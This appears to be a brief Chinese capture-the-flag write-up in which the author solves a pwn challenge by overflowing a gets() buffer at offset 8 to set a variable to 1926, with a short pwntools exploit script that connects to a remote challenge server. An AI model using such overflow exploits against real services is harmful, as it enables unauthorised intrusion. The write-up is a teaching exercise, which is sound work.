今天被一道被一道web给虐暴了自闭中~~~~~
所以我做到pwn来缓缓
用ida打开只要v5=1926
就可以看flag
但按照前面的逻辑不可以等于所以
就涉及到了溢出
gets()这个很普遍了吧
直接算出偏移为8
然后就上exp咯
from pwn import *
p=remote('111.198.29.45',56377)
payload='a'*8+p64(1926)
p.recvuntil('Your Birth?')
p.sendline('1999')这里随便输的
p.sendline(payload)
p.interactive()
flag到手嘻嘻